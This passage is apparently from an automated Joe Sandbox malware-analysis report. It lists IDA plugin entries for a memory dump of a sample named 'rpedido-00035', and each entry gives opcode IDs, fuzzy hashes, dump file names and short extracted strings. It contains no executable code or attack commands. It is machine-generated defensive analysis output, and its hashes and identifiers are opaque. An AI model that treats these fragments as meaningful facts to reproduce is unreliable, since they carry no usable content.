                                                          • Opcode ID: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                          • Instruction ID: 35652beac34d66267515a4851183399f177f39abd83327c003386d83c0fa26a3
                                                          • Opcode Fuzzy Hash: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                          • Instruction Fuzzy Hash: BB618CB9D00219AFEB11CFA5C942BDEBFF4EF84714F10419AE811B7250DB708A41CBA5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: #%u
                                                          • API String ID: 0-232158463
                                                          • Opcode ID: 72aa499f767c5659ae41dc3825036b5e223fe36b44dc46f1b03f12f13af04236
                                                          • Instruction ID: c3677252a71e6420f4e69b98a94b8a1eaa1f3113a2f286fa6732463e29ff4e50
                                                          • Opcode Fuzzy Hash: 72aa499f767c5659ae41dc3825036b5e223fe36b44dc46f1b03f12f13af04236
                                                          • Instruction Fuzzy Hash: EE714F71E002599FDB05CFA9CA82FAEBBF8BF08744F1540A5E901E7251E734E941CBA5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @
                                                          • API String ID: 0-2766056989
                                                          • Opcode ID: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
                                                          • Instruction ID: adf22b9493010d9c3d55ebe3ed4870bf712bf40c2f0a49aa1a1f01d3c6a3bf58
                                                          • Opcode Fuzzy Hash: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
                                                          • Instruction Fuzzy Hash: 0151BEB2504701AFE3128F55CD42FABBBE9FF84754F5049A9B640972A0DBB1ED04CB92
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: EXT-
                                                          • API String ID: 0-1948896318
                                                          • Opcode ID: be64211b857506a505fe8aa2f1896a327e294b17334e2dae5e20cd62aa6f1c29
                                                          • Instruction ID: a6abc8a9c6de9eb2989a6897efc1dba9bd1f333e55d3bd6aecc98c0b02401503
                                                          • Opcode Fuzzy Hash: be64211b857506a505fe8aa2f1896a327e294b17334e2dae5e20cd62aa6f1c29
                                                          • Instruction Fuzzy Hash: A241A1719593519FE710CA61C986B5FBBD8AF8C748F4009ADF684E7280EA74C908C797
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: BinaryHash
                                                          • API String ID: 0-2202222882
                                                          • Opcode ID: 39de6a1477dc94f5fd618ed9da7b910ee10b4ba77986ca27459aca6d2c2edc48
                                                          • Instruction ID: 814bf8cb1b489c1b6837f27fd1c5484690b4c7c9878976fb3e4933eb77eb9188
                                                          • Opcode Fuzzy Hash: 39de6a1477dc94f5fd618ed9da7b910ee10b4ba77986ca27459aca6d2c2edc48
                                                          • Instruction Fuzzy Hash: 204130B190012CABDB21DB50DD82FDEBBBCAB45714F1145E5AA08AB150DB309E89CFA5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: verifier.dll
                                                          • API String ID: 0-3265496382
                                                          • Opcode ID: 7bb6525ac3b69dd511b8db4a83da5cd2ee4e4e1608bcb90d2eb221e7de3a36dd
                                                          • Instruction ID: b2690c3a97dfbdd292b9e9649ed85d4bef83bdf8bd1f4443d42e42f32a46743a
                                                          • Opcode Fuzzy Hash: 7bb6525ac3b69dd511b8db4a83da5cd2ee4e4e1608bcb90d2eb221e7de3a36dd
                                                          • Instruction Fuzzy Hash: BF315BB5B103019FEB108F69D951B677BF6EB88314F9540AAE644DF391EA31CC81DB90
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: #
                                                          • API String ID: 0-1885708031
                                                          • Opcode ID: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
                                                          • Instruction ID: 9e49f78bc7f6a104143cd945ca75424a5fb8291680302a21967874e53122caee
                                                          • Opcode Fuzzy Hash: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
                                                          • Instruction Fuzzy Hash: AB41B175A006259BEB22DF84C886BBEBFB4EF80785F1044EAE94197240DB30D941CBE1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Flst
                                                          • API String ID: 0-2374792617
                                                          • Opcode ID: 6a24155a36596672bd51eaae4c16e5c19bf6332d6fc8112b9f6727e6d1e52104
                                                          • Instruction ID: 395e849d150a28c4d06907520f1f57dba37c168277270f8423b291b80116fce7
                                                          • Opcode Fuzzy Hash: 6a24155a36596672bd51eaae4c16e5c19bf6332d6fc8112b9f6727e6d1e52104
                                                          • Instruction Fuzzy Hash: 6C41BDB0605302DFE31ADF26C581616FFE5EF49714F9081AEE4988B281D771D885CBD5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: 3ew3ew
                                                          • API String ID: 3446177414-982314038
                                                          • Opcode ID: 13203f74e1bc8579b76bd3caa0d175647d1b6e2c37466e7a204267c121d0cd54
                                                          • Instruction ID: 45dfcaa009f87b68273120f1aa91e031c21e8cd6f4f5b4b3ba249f50dec889f4
                                                          • Opcode Fuzzy Hash: 13203f74e1bc8579b76bd3caa0d175647d1b6e2c37466e7a204267c121d0cd54
                                                          • Instruction Fuzzy Hash: B921CF76900710AFE7218F5AC841B1A7FF5FB84B54F1118A9A6999B341DB30D901CFD1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: BinaryName
                                                          • API String ID: 0-215506332
                                                          • Opcode ID: d3fab1c07030efc05930a9e3184861439c1b18a7b8dd29ba45a1b07bd625d137
                                                          • Instruction ID: c629d4bace4ef9857caf2dfd954126fe1dc8e8f846687c231c57d9ea34d6539f
                                                          • Opcode Fuzzy Hash: d3fab1c07030efc05930a9e3184861439c1b18a7b8dd29ba45a1b07bd625d137
                                                          • Instruction Fuzzy Hash: B731017AD00619AFEB16CB59C946E6FBFF4EF82B20F1141A9E901A7250D7309E04C7E0
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 561b46118abd95379417ee15a1b6534f66f4ce7102c42680a57294336c4d77c5
                                                          • Instruction ID: 1335f6549df6b1ed80e4d238aa9f5cd92f73ce293bd55d4eebf9c038cbfe594c
                                                          • Opcode Fuzzy Hash: 561b46118abd95379417ee15a1b6534f66f4ce7102c42680a57294336c4d77c5
                                                          • Instruction Fuzzy Hash: 42322274E207588FEB14CFA6C8527AEBFF2BF84344F20419DD4469B280DB34A862CB54
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d0b12f8eadc53c2c23974f36c71a0f502ddfe0242a3d8c43a832146264698255
                                                          • Instruction ID: e34d0aa6ef29609cd7336aace7700fab9ac1120620775f34d7c0c988bdfa6d0e
                                                          • Opcode Fuzzy Hash: d0b12f8eadc53c2c23974f36c71a0f502ddfe0242a3d8c43a832146264698255
                                                          • Instruction Fuzzy Hash: 39227E75E003168FDB09CF59C491AAEBFF2BF89348B2486E9D855DB345DB30A941CB90
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 35c71734362fe48f98b951d8fbbaf7c74fcb49759ec8d738ed4949d484ab030e
                                                          • Instruction ID: 9a32f2ea24c325852d24e6ac94eef01ff6c0be472e8875342066abe045d4512e
                                                          • Opcode Fuzzy Hash: 35c71734362fe48f98b951d8fbbaf7c74fcb49759ec8d738ed4949d484ab030e
                                                          • Instruction Fuzzy Hash: 3CD1DBB5A0031A9BEF04CF66C8C2AAE7BF5FF44348F5541A9E9159B280EB30D945CB90
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7312ef0ef1cb30eefde2a023d63c5947780ffb1067bdd41c99fd547044d0f0ff
                                                          • Instruction ID: 52bc1a57ef2de440c6c544386746df2735eedf661459d0aefbb2856803e37ed6
                                                          • Opcode Fuzzy Hash: 7312ef0ef1cb30eefde2a023d63c5947780ffb1067bdd41c99fd547044d0f0ff
                                                          • Instruction Fuzzy Hash: EAC1C479E103169FEB18CF69C852B9EBBF1EF44354F548299E824AB2C0D770E941CB94
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2541e3eead2c26643fdb6e6dac28f7e2200693327103d4cf9a80d7f2803b3056
                                                          • Instruction ID: 6f1b4b423f51e082f2ee930dca502b91175e8d33b10be3b288f528c90154574e
                                                          • Opcode Fuzzy Hash: 2541e3eead2c26643fdb6e6dac28f7e2200693327103d4cf9a80d7f2803b3056
                                                          • Instruction Fuzzy Hash: 1ED134B59002049FEB51DF68CA81B9A7FF9BF08344F1544BAEE499B216E731D944CBA0
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 75fa01fe68842301f520c8033526d236dd104127a11abbcaf71d1ada57f5719d
                                                          • Instruction ID: 278372672b8a3f7eda5ca0bcd1c3da04c1f5349a8a16d565acd7e3b81b9a9b2c
                                                          • Opcode Fuzzy Hash: 75fa01fe68842301f520c8033526d236dd104127a11abbcaf71d1ada57f5719d
                                                          • Instruction Fuzzy Hash: 1AC112B5E40231CFEB04CF1AC59276DBBE1FF48B88F5580DAEA419B291D7708991C7A0
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c25d0f13b6407ab26058c35a9f344e4d2f6c2bc2029f1d466b710675187c85cd
                                                          • Instruction ID: 9635e4158e98b5fe929334462a5f022e4abbd340d961296f6f5931ceee46cd5b
                                                          • Opcode Fuzzy Hash: c25d0f13b6407ab26058c35a9f344e4d2f6c2bc2029f1d466b710675187c85cd
                                                          • Instruction Fuzzy Hash: 8FC146B59007059FDB19CFA9C982A9EBFF5FB48744F1044AAE506EB350EB34A901CF90
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 63b20c421a5f0d7cf45695429102df60821ed91581afdeee7473aace158a234d
                                                          • Instruction ID: 6ae9f528804ce5926260e4ed207203da433ee300d7ab262ab98a394b959e9f53
                                                          • Opcode Fuzzy Hash: 63b20c421a5f0d7cf45695429102df60821ed91581afdeee7473aace158a234d
                                                          • Instruction Fuzzy Hash: 79B13671B007159FEB15CBA5CA92B6EBFF6AF84314F1045E8D5929B280DB30DD80CBA5
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 12ec940656509d42af20308d2f5bd989c35a97931a060c4c25ffa269188e6a0d
                                                          • Instruction ID: c65d806ebd94a7bd7087028e7158c860255755829472479987d667b3394617bb
                                                          • Opcode Fuzzy Hash: 12ec940656509d42af20308d2f5bd989c35a97931a060c4c25ffa269188e6a0d
                                                          • Instruction Fuzzy Hash: D0C15A785083408FE360CF15C495BABBBE5FF88344F5449ADE98987290DB74EA49CF92
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4906c23f8d9cbe9592041f6f9e178e28cf87652508b6a1e3c03404a9fa90ef79
                                                          • Instruction ID: 22042f7773530f6f462817f30910b21a25f2a8c40fb30233fec56bd7f68cf2b5
                                                          • Opcode Fuzzy Hash: 4906c23f8d9cbe9592041f6f9e178e28cf87652508b6a1e3c03404a9fa90ef79
                                                          • Instruction Fuzzy Hash: F8B1A178A002658BEB24CF65CD91BADB7F1EF45744F1085EAD44AAB290EB309DC5CF21
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3599e46c737e3146a78bc8cb32e1af45496e8ae40217545121875a50cb925b3a
                                                          • Instruction ID: 8656aed8a701c3d68b226db6ef73fda47f3ca3266122a2b273bcd6e02ef01b0c
                                                          • Opcode Fuzzy Hash: 3599e46c737e3146a78bc8cb32e1af45496e8ae40217545121875a50cb925b3a
                                                          • Instruction Fuzzy Hash: F0A10174B04716DFEB14DF69CA82BAEBBF5FF44344F5100A9EA5697280DB34A815CB80
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b1d0b5f1e6fcd120462c6230c1fdd35addf2dcb81d0f61b4c81bf57d340e0d7b
                                                          • Instruction ID: 3b971e33419d3d88b3e04cbc1f79204c8f3af86a4e2b0ecf5152b6444b690910
                                                          • Opcode Fuzzy Hash: b1d0b5f1e6fcd120462c6230c1fdd35addf2dcb81d0f61b4c81bf57d340e0d7b
                                                          • Instruction Fuzzy Hash: 4AA1CDB2A14B21AFD711CF64C982B0ABBE5FF48704F5109A9E685DB650C734EC51CBA2
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1d36f8e42a11991a57cf016d69fe22de4320deda6eddabd2e06806cfbc7f8ad2
                                                          • Instruction ID: 97a027bcb2448a594a297b2823d66835b71ac337227d685fb508441cc0fadc9c
                                                          • Opcode Fuzzy Hash: 1d36f8e42a11991a57cf016d69fe22de4320deda6eddabd2e06806cfbc7f8ad2
                                                          • Instruction Fuzzy Hash: 11913379E006248FEB00CB6AC886B6E7FE1FF88754F5540E9E8409B290DA34DD41CB92
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a25ce82d1d61f4ca83fc242ca87c1ee84e0656744a5cf7df39fb26c4aae34439
                                                          • Instruction ID: 926811cba178748460fd95b3fe3de7b9b3c80e1a3dc3e5c438afbf1bcd4b5b11
                                                          • Opcode Fuzzy Hash: a25ce82d1d61f4ca83fc242ca87c1ee84e0656744a5cf7df39fb26c4aae34439
                                                          • Instruction Fuzzy Hash: 87B16DBC900305CFEB14CF19D582B987BF1BF48358F6041D9D9A2AB291DB34D882CBA0
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: de14a1d403f52bb1312188ec82e821103488e1cf2f2437a345a456acf81185d0
                                                          • Instruction ID: 85eb1074440f48222a44bbe6c6a3a3ef383959e62b5f79e61b4e1c5640881d8c
                                                          • Opcode Fuzzy Hash: de14a1d403f52bb1312188ec82e821103488e1cf2f2437a345a456acf81185d0
                                                          • Instruction Fuzzy Hash: BAA17C79A08341CFE314CF28C585A1ABFE5FF88744F2449ADE5849B350EB30E985CB92
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b10c7932b254f136361a00da209bd0f1f317ff6b27432d4030294687b97bdc54
                                                          • Instruction ID: 5327236853952d309f4f3eb6569f6f1fc4b6aef18eaad05c9394189bfd4ecca4
                                                          • Opcode Fuzzy Hash: b10c7932b254f136361a00da209bd0f1f317ff6b27432d4030294687b97bdc54
                                                          • Instruction Fuzzy Hash: 65817075A003159FDF08CF59C881AAEBBF6FF84314F1582A9D815AB354DBB4E902CB90
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3bd6bb45f2ff03ac3460fc56b718573f81f2f6c7441370bccea4be0320480504
                                                          • Instruction ID: 44b411ed974ca72eae369cadc1136aabf15cddebb477bcaa9982ac994d0e3852
                                                          • Opcode Fuzzy Hash: 3bd6bb45f2ff03ac3460fc56b718573f81f2f6c7441370bccea4be0320480504
                                                          • Instruction Fuzzy Hash: 3C71C575E8021A9BDB10CF56D992AAFBBF9EF44780F95419ADC00DF240E734D981CB90
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3a8c02d37c523aec0cf0e40f01ca2b85cd3d7c935030a1954bf952fbfbc2804d
                                                          • Instruction ID: 962e631148fd0b60a5a7ee0e1de7fd82d6c06287c2091f7531bf4fa70d35700c
                                                          • Opcode Fuzzy Hash: 3a8c02d37c523aec0cf0e40f01ca2b85cd3d7c935030a1954bf952fbfbc2804d
                                                          • Instruction Fuzzy Hash: DC61E274F00315AFEB058E69C982BAEBFEAAF84754F504399E891A72C4DB70C941C791
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
